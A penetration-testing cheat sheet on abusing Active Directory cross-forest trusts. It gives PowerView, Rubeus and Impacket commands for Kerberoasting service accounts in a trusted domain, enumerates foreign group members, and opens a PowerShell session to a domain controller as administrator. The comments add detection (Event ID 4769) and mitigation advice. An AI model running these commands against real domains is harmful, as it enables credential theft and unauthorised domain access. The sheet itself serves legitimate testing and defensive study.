Cross-Forest Trust Abuse
Windows
Cross-Forest Kerberoasting
# Enumerate accounts that have a Service Principal Name (SPN) set in the domain named by -Domain, using PowerView.
# Every account returned can have a service ticket requested for it, so this list is that domain's Kerberoasting exposure.
Get-DomainUser -SPN -Domain DOMAIN.LOCAL | select SamAccountName
# If the command above returns an account, list its group memberships.
# memberof shows what a recovered password would grant; SPN accounts in privileged groups are the first candidates
# for a gMSA or a long random password.
Get-DomainUser -Domain DOMAIN.LOCAL -Identity username |select samaccountname,memberof
# Perform a Kerberoasting attack with Rubeus against a single account; /domain names the target domain
# and /nowrap prints the ticket hash on one line.
# Detection: the service-ticket request is logged on the target domain's DCs as Event ID 4769; a request using
# RC4 ticket encryption (type 0x17) for a user-account SPN is a common indicator.
.\Rubeus.exe kerberoast /domain:DOMAIN.LOCAL /user:user /nowrap
Admin Password Re-Use & Group Membership
# Enumerate groups in the domain whose members do not belong to that domain, using PowerView.
# The same query serves as an audit of which foreign accounts hold rights across the trust.
Get-DomainForeignGroupMember -Domain DOMAIN.LOCAL
# Open a remote PowerShell session on the DC with Enter-PSSession; -Credential names the account to authenticate as.
# Per this section's heading, access depends on the administrator password being reused across the trust or on
# foreign group membership; unique administrator passwords per forest and a review of the memberships listed above
# address both.
Enter-PSSession -ComputerName DC03.DOMAIN.LOCAL -Credential DOMAIN\administrator
Linux
Cross-Forest Kerberoasting
# List accounts with SPNs in the domain given by -target-domain, using Impacket's GetUserSPNs.py.
# Without -request this only lists the accounts; no service tickets are requested.
# NOTE(review): the credential is written DOMAIN/user here but DOMAIN.LOCAL/user in the next command;
# presumably the same account is meant. Confirm and use one form.
GetUserSPNs.py -target-domain DOMAIN.LOCAL DOMAIN/user
# Request the service tickets (-request) and print them as hashes.
# The target domain's DCs log these requests as Event ID 4769; AES-only service accounts with long random
# passwords (or gMSAs) make the resulting hashes impractical to crack.
GetUserSPNs.py -request -target-domain DOMAIN.LOCAL DOMAIN.LOCAL/user